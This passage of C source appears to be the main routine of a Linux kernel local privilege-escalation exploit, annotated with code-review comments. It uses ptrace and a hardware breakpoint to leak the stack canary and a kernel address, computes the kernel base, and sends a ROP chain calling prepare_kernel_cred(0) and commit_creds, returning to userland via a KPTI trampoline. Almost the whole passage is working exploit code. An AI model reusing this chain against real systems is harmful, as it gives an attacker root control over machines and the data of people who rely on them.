 *  5. Derive the canary and kbase from the leak, build the payload and send
 *     it to the victim over sync_pipe[0].
 *  6. Keep resuming the victim forever.
 *
 * The function does not return normally: the final resume loop never breaks,
 * so everything after it is unreachable.
 */
int main(void) {
do_init();

logd("fork victim child ...");
switch (child = fork()) {
case -1:
die("fork child: %m");
break;
case 0:
// victim child
fn_child();
exit(0);
break;
default:
// parent: block until the child changes state (its status is discarded)
waitpid(child, NULL, __WALL);
break;
}
logd("child pid: %d", child);

// kill child on exit
if (ptrace(PTRACE_SETOPTIONS, child, NULL, (void *)PTRACE_O_EXITKILL) < 0) {
die("ptrace set PTRACE_O_EXITKILL: %m");
}

// watch the first byte of the shared buffer in the child
logd("create hw_breakpoint for child");
create_hbp(child, (void *)GLOBAL_MMAP_ADDR);

logd("fork write-anywhere primitive trigger ...");
switch (trigger = fork()) {
case -1:
die("fork trigger: %m");
break;
case 0:
fn_trigger();
exit(0);
break;
default:
break;
}

logd("waiting for stack data leak ...");
struct pollfd fds = {.fd = sync_pipe[1][0], .events = POLLIN};
while (1) {
// resume the child and wait for its next stop
if (ptrace(PTRACE_CONT, child, NULL, NULL) < 0) {
die("failed to PTRACE_CONT: %m");
}
waitpid(child, NULL, __WALL);

// use poll() with a zero timeout to check if there is data to read
int ret = poll(&fds, 1, 0);
if (ret > 0 && (fds.revents & POLLIN)) {
// NOTE(review): the read() result is not checked
read(sync_pipe[1][0], GLOBAL_MMAP_ADDR, GLOBAL_MMAP_LENGTH);
break;
}
}

// the leak comes from the victim child; it starts right after the utsname data
hexdump(GLOBAL_MMAP_ADDR + sizeof(struct utsname), 0x100);
// NOTE(review): this pointer is not 8-byte aligned unless sizeof(struct
// utsname) is a multiple of 8 -- confirm the unaligned loads are intended
uint64_t *leak_buffer =
(uint64_t *)(GLOBAL_MMAP_ADDR + sizeof(struct utsname));
uint64_t canary = leak_buffer[0];
logi("canary: 0x%lx", canary);
// presumably a kernel text address; the 0xe0b32 offset is build-specific
uint64_t leak_kaddr = leak_buffer[4];
logi("leak_kaddr: 0x%lx", leak_kaddr);
uint64_t kbase = leak_kaddr - 0xe0b32;
logi("kbase: 0x%lx", kbase);

// start build rop gadget ...
logd("build rop ...");
// payload layout (64-bit words): zero fill, canary at CANARY_OFF, chain at
// ROP_START_OFF
uint64_t rop[ROP_START_OFF + ROP_CNT] = {0};
rop[CANARY_OFF] = canary;
// address that is written byte by byte into somewhere_writable below
uint64_t gadget_data = pop_rdi;
uint64_t rop_buf[ROP_CNT] = {
// prepare_kernel_cred(0)
pop_rdi, 0, prepare_kernel_cred,

// mov qword ptr[somewhere_writable], gadget_data
pop_rdx, (gadget_data >> (8 * 0)) & 0xff, pop_rdi,
somewhere_writable + 0, dl_to_rdi, pop_rdx,
(gadget_data >> (8 * 1)) & 0xff, pop_rdi, somewhere_writable + 1,
dl_to_rdi, pop_rdx, (gadget_data >> (8 * 2)) & 0xff, pop_rdi,
somewhere_writable + 2, dl_to_rdi, pop_rdx,
(gadget_data >> (8 * 3)) & 0xff, pop_rdi, somewhere_writable + 3,
dl_to_rdi, pop_rdx, (gadget_data >> (8 * 4)) & 0xff, pop_rdi,
somewhere_writable + 4, dl_to_rdi, pop_rdx,
(gadget_data >> (8 * 5)) & 0xff, pop_rdi, somewhere_writable + 5,
dl_to_rdi, pop_rdx, (gadget_data >> (8 * 6)) & 0xff, pop_rdi,
somewhere_writable + 6, dl_to_rdi, pop_rdx,
(gadget_data >> (8 * 7)) & 0xff, pop_rdi, somewhere_writable + 7,
dl_to_rdi,

// mov rdi, rax
pop_rcx, somewhere_writable, push_rax_jmp_qword_rcx,

// commit_creds(cred)
commit_creds,

// return to userland
kpti_trampoline,
// frame: two placeholder words, then ip, cs, eflags, sp, ss
// NOTE(review): user_sp is masked down to a 0x100-byte boundary
0xdeadbeef, 0xbaadf00d, user_ip, user_cs, user_eflags,
user_sp & 0xffffffffffffff00, user_ss};
memcpy(rop + ROP_START_OFF, rop_buf, sizeof(rop_buf));

logd("send rop gadget to victim child ...");
// NOTE(review): the write() result is not checked
write(sync_pipe[0][1], rop, sizeof(rop));

logd("fire ...");
// keep resuming the child; this loop only ends through die()
while (1) {
if (ptrace(PTRACE_CONT, child, NULL, NULL) < 0) {
die("failed to PTRACE_CONT: %m");
}
waitpid(child, NULL, __WALL);
}

// NOTE(review): unreachable -- the loop above never breaks
while (1) {
sleep(100);
}

return 0;
}

参考